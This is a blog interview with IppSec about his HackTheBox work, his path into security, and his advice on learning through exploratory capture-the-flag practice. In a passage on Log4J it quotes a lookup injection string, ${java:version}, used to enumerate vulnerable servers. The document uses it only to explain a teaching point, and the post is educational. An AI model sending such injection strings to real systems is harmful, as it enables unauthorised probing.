Hey guys, I have an absolute treat for you today as I have been speaking to IppSec of the YouTube walkthrough fame. I have been trying to speak to him for AGES and he finally agreed ?
I am positive you are all aware who IppSec is but in case you are not he is the guy with over 157k followers on YouTube and 66.1k on twitter. His videos have helped and inspired so many people to get into ethical hacking, get started on specific techniques and he has become somewhat of a guru in the CTF world over 7 MILLION views on his videos.
IppSec has a great website which is essentially a search engine for his videos but instead of room and server names you can search for a specific technique or term like Nmap.
The first I became aware of IppSec was well over a year ago whilst trying to get my head around tmux where I came across his channel after finding the video ‘Introduction to tmux’, he is a great teacher and ridiculously knowledgeable on what he speaks about.
Something I was completely unaware of until speaking to him is that he actually WORKS for HackTheBox, I reckon not a lot of people know this fact, I a not surprised given his skill set and how good his videos are but I had just never seen it or heard it anywhere else before.
You are going to love this interview:-
You obviously work in cybersecurity/ethical hacking, is there any clues you can give as to which role you currently have?
I joined HackTheBox officially January of last year (2021) as a “Training Architect”. I still don’t really know what that role means but I view it as a Senior QA (Qualified Assurance). The only other person with that role in the company is 0xdf, whom I convinced to join HackTheBox right after I joined. We go to various departments and do our best to help out, train, and put processes in place to raise the bar in what we release. One of the biggest focus points last year was on our weekly machines and based upon the machine ratings I think we did a good job. I can’t remember the last time we put out a machine that used “CTF Elements” to teach lessons.
An example of what we define “CTF Element” is communicating with the player to tell them to do something, this would be like getting a shell on the box and finding a text file instructing users where to look for the next step. While that does make it quicker to solve, it robs the player of enumeration skills, we always try to make sure something stands out either in a log file, timestamp, etc.
I also work on a lot of projects that only business partners of HTB gets to see such as a “Candidate Assessment” Portal, which allows companies to use HackTheBox to vet candidates or measure the skillsets of their existing employees. Another fun project I am heavily involved in is the CTF’s for DataDog that allowed users to attack a server and then catch themselves (and others) in the logs via the Datadog Platform.
I have been asking for a while to interview you, but you are known as a pretty secretive guy generally, is that about to change in the sense of would you consider doing talks and training course outside of YouTube, seems a natural progression and your voice, patience and temperament would fit perfectly?
Prior to creating the IppSec YouTube channel – I had a decent following streaming myself playing/commentating StarCraft 2. Unfortunately, there are also a lot of trolls on the internet, and had quite a bit of anonymous harassment sent my way which made me dislike streaming. When starting the IppSec Channel, I figured if people didn’t view me as a person, I may avoid some of that harassment. It is boring this way and I gave streaming another shot a year ago, but some viewers put dirty XSS Redirects on a web challenge I was streaming. Thankfully, I noticed it before navigating there with my browser but that was still a reminder of the past I didn’t feel like reliving. However, with my role at HackTheBox I have some motivation to be a bit more open.
Your videos are a massive favourite not just with me but the community at whole because of your huge understanding and knowledge of many skills in this field, what kind of stuff like programming language and operating systems do you tend to use most?
I don’t really have a good answer to that question. I change pretty frequently, when I was a kid from like 2004-2009, I ran a tech blog that tried to put outposts every Monday, Wednesday, Friday which forced myself to constantly pick up new things and figure out ways to explain it so other people could follow. I think many people would be surprised with how often that material I talk about in a video, is something I had learned from doing the box. I never went to college, pretty much everything has been self-taught.
How did you get into ethical hacking?
Ethical hacking has mostly been a hobby. It started out in my early teenage years playing with reversing video games and instant messengers to build things to mess with friends. However, I had always been hacking up random at home projects or building crappy middleware for work. I was never a traditional pentester or red teamer and it wasn’t until 2015 that my role was purely in the security realm.
And how did the videos come about; did you expect them to be as popular as they are?
I started doing video game videos back in 2010 to help my speech. I have/had Rhotacism, which is a speech impediment with saying certain letters, most famously the “R”. If you still don’t know, think Elmer Fudd or Kripke from Big Bang Theory as they are two pretty popular characters that shared the impediment. Gaming was always a passion, so I streamed on Livestream playing and talking as part of speech therapy to better myself. After Livestream, I did uStream, then JustinTV, and then Twitch when JustinTV Rebranded. I actually knew a lot of the Twitch Staff and was probably one of the first affiliated/sponsored streams.
I stopped gaming when I switched job fields to security in 2015, I noticed my speech started to slip around the time I found out about HackTheBox. So I started doing videos to work on my speech again and it also served as a way to peer pressure myself into being consistent with my training. I also wanted to be a SANS Instructor at that time, and the videos were a way to build that type of resume up. If you asked me a year or two ago, I would say I’m surprised with how popular my videos are. However, I have noticed a lot of channels that focus on production value get a lot more views, which does make sense since they are appealing to a larger audience. But I was really hoping the quality of my videos and ability to search via http://ippsec.rocks would be enough to outweigh my lack of production/advertising.
I spend a lot of time on TryHackMe and although I am a member of HTB I’m not going to lie I find it quite intimidating. Any tips for people like me who would love to move over from walkthroughs to more CTF type stuff?
First off, I think it’s important to understand why HackTheBox is the way it is. Over the past year we have put out a lot of “Guided Learning” material which is like TryHackMe via Academy and the updated version of Starting Point. However, we still put out a lot of “Exploratory Learning” material which is what people find intimidating. I know this isn’t a “fan favourite” approach as many people have moved away from the “Try Harder” mantra but I believe we fit the middle ground.
The main issue with depending too much on Guided Learning (Certs/Walkthroughs/Etc) is that all the material is built to work and tested to ensure the commands they provide do work. This sounds great, but since there is always instant gratification when you copy and paste an exploit; you never build up the skillsets of debugging when things go wrong or the stamina to keep trying. Exploits often will not just work out of the box and if your previous experience with an exploit was that it worked, when it fails on-the-job then it is easy to assume the target is nor vulnerable and move on. If you practice the hard way you may think of other things you can do with that exploit (ex: instead of RCE just leaking application secrets that can forge a cookie). Or even just simplifying the exploit and instead of using it to get code execution, try putting in a sleep, DNS request, echo, etc to verify at least a piece of the exploit works.
If I was a beginner, I imagine my methodology to studying would be:
- Establish Your Methodology: Read writeups, or watch videos and work along side them. Don’t worry about “spoilers” ruining your learning experience, there will always be more boxes.
- Validate The Methodology: Watch a video in its entirety, then immediately do the box. If you are short on time, then divide machines parts, for example watching up to the user flag then solving the machine.
- Work on Memory Retention: Add some time between watching the video and solving the machine. Start off with a few hour break between the video and solving the machine. Eventually, graduate up to waiting a day between. Don’t be afraid to go back and watch the video when you are stuck on a part for 20-30 minutes.
- Make Hacking Muscle Memory: Watch multiple videos but solve the machine yourself days later. Having watched multiple videos or read writeups before solving the box will really test your skills.
By now, you should be able to do machines on your own. Solve machines and use the video if you get stuck for too long and/or when you finish the machine. There are always multiple ways to approach the problem and its incredibly beneficial to see how others are doing it.
While doing this, keep in mind it is extremely tough for everyone to stay motivated, don’t give up! The toughest thing about this field is the lack of indicators that you are actually improving. It’s very easy to hit points where you can study for a month or two and feel like you’ve made little progress. This is especially true when the thing you are learning is how to struggle and figure things out, which is a skill you cannot get from certifications/courses/etc. I strongly believe HackTheBox does a good job with the skillset. I believe one of the biggest misconceptions by the newer teachers is they think Try Harder means banging your head into the wall, in reality I always thought that phrase meant take a step back and change things up slightly.
What types of benefits do you think Exploratory Learning has?
I build many of the UHC Machines on behalf of HackTheBox (UHC is a streamed hacking competition). Obviously, Log4J was a massive exploit last month and we featured it in UHC. If you watch the stream, many people find the Log4J vulnerability successfully but fail to actually exploit it. Many of them went to a room that John Hammond (Great guy/friend) made for TryHackMe. They did a great job on being the first to have material out for the exploit but to be vulnerable they had to configure it with an outdated version of Java that supported Remote Class Loading. I don’t believe the room really stated the edge case this was configured in, so a lot of the UHC Players were frustrated when the way they learned to exploit it did not work because our UHC Machine had a modern version of Java. Not a single player knew about the “JNDI-Exploit-Kit” because the “guided” learning material available did not utilize it. However, twitter and threat feeds made plenty of mention of it. Additionally, players only knew how to get code execution when it was vulnerable in that edge case and went down a lot of rabbit holes trying to get their exploit to work, for example obfuscating the class thinking it was Antivirus blocking it. If you watch my video (LogForge), you’ll see me do a bunch of enumeration from the exploit such as leaking java/OS version and environment variables which would have confirmed why the Remote Class Loading wasn’t working. The enumeration is simple, its just putting ${java:version} in the URL for the exploit but enumeration is really tough to show in guided learning people skip right over that capability and go straight to running code and missed it.
Another example is with ProLabs, which are enterprise networks built to replicate what people may come across in a Penetration Test. This lab starts off exploiting a WordPress box and using it to pivot into the internal network. Once you compromise WordPress and root the box, you can get other users credentials and use it with SSH to pivot. Credentials get changed and people think it’s completely broken and give up asking for a revert. However, there is some automation in play to make sure root’s SSH key does not change. So if instead they grabbed the SSH Key, they would not have this problem. I could put automation to prevent the user’s password from being changed to make it a more pleasant learning experience, however many enterprises will rotate credentials (especially if they detect a compromise). However, they rarely will rotate API/SSH keys especially when it is a shared account (ex: root). So, this is a valuable learning experience that would be hard to capture from just following a walk-through. Yes, there probably have been countless hours wasted due to that simple thing but everyone I talk to in Discord says “oh man I’ll never make that mistake again” because of how simple the work around was.
I take a lot of pride that many of the blog posts about passing OSCP end with “then I watched IppSec and learned methodology and passed”, which is a testament to the HTB Learning Style. I met one of my now best hacking friends 0xdf at a SANS Conference, who like me was just a computer person but not security prior to HTB. He has often said how much he learned because my videos taught him what he needed to know to do HackTheBox. Now when I read his blog or just talk with him daily as I got him to join HackTheBox with me, he’s the one teaching me most of the time as we do boxes then chat about our paths afterwards so we can create our own material sharing what we learned.
Other than doing the HTB servers what else do you do for learning your skills?
I do other CTF’s occasionally with friends, but primarily I just try to read a new book every month on topics that interest me and find projects to work on. When I was a sysadmin, I built a C2 that primarily was used for IR Purposes. This was before things like Splunk and Sysmon were popular, and I did things like hook the event log and run some basic IR stuff on suspicious logs or a periodic basis. I also played a lot with Arduino’s and pi’s building various stupid home automation stuff that I have mostly scrapped by now. For example, I had a webcam hooked up to a pi that would read license plates outside of my window when I lived in a Townhouse and I set that up when car break-ins were becoming a problem. It’s not really beneficial to hacking but the skills are transferable.
What other hobbies do you have (if any) other than hacking?
Majority of my friends are not computer people. Before the pandemic we played various local beer league sports such as softball and kickball. Nowadays, it’s a lot of hanging out and hiking. With the new year I want to get back into bicycle riding.
With so many people wanting to get into CTF’s and Bug Bounty nowadays any words on what would be a good grounding for them, some stuff they should learn early on?
Personally, I don’t really like Bug Bounties. On paper its great but both the hackers and companies, try and take advantage of each other. Companies try to get cheap security and the hackers try to mass report in order to get as much value as possible. For example reporting a SSRF as every possible protocol it can speak, lfi, etc when in reality all the vulnerabilities come from the same line of code. To get started, I would recommend the path I said earlier on getting started with HackTheBox or taking the OWASP Top 10 and searching the vulnerabilities on https://ippsec.rocks to see myself exploiting and explaining them. There’s also the Bug Bounty Hunter track on HackTheBox academy which helps lay out fundamentals. I believe it does cost ~$70usd but a lot of the modules in that path are absolutely free.
What’s the plan for 2022 and onwards?
I don’t have any major plans. I’m hoping to get to a point where I am releasing more than one video a week but I’m spending a lot of time working on some cool projects for HackTheBox. One of the main projects I am working on is improving the stability of the Pro Labs and adding a lot of features for business users of those labs.
Please give him and HackTheBox a follow and subscribe at the following.
IppSec Website = https://ippsec.rocks/?#
IppSec YouTube = https://www.youtube.com/ippsec
IppSec Twitter = https://twitter.com/ippsec
HackTheBox Website – https://hackthebox.eu/
HackTheBox YouTube = https://www.youtube.com/HackTheBox
HackTheBox Twitter = https://twitter.com/hackthebox_eu
Thanks master
cool stuff